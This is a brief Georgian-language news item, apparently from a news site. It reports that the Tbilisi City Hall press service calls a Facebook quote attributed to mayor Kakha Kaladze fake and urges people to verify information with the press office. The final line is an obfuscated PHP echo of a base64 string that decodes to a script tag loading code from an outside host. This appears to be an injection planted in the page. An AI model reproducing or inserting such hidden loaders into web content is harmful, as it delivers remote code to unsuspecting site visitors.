celsiusi
ავერსი საქკაბელი
თბილისის მერიის პრესსამსახური განცხადებას ავრცელებს. განცხადებაში აღნიშნულია, რომ სოციალურ ქსელში თბილისის მერის ფოტოთი გავრცელებული ციტატა სიმართლეს არ შეესაბამება.
„სოციალურ ქსელ „ფეისბუქში“ მთელი დღის განმავლობაში ვირუსულად ვრცელდება თბილისის მერის, კახა კალაძის ფოტო, ვითომდა მისივე ციტატით: „მეც დავდივარ ევროკავშირის წევრ ქვეყნებში და მეც დავდივარ იტალიასა და საფრანგეთში, ხან იქ, ხან აქ, მაგრამ არ ვარ ასე არაფერს ჩაციებული. ვისაც ასე ძალიან გინდათ, აეროპორტის გზა ყველამ კარგად იცით“. აღნიშნული ციტატა არ ეკუთვნის თბილისის მერს და არის ე.წ. „ფეიკი“, რომელსაც არაფერი აქვს საერთო რეალობასთან. მოვუწოდებთ ყველას, ნუ შეუწყობთ ხელს სიცრუის ტირაჟირებას.
თბილისის მერიასთან დაკავშირებული ნებისმიერი ინფორმაცია გთხოვთ, მუნიციპალიტეტის პრესსამსახურთან გადაამოწმოთ“,- აღნიშნულია თბილისის მერიის პრესსამსახურის განცხადებაში.
261
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");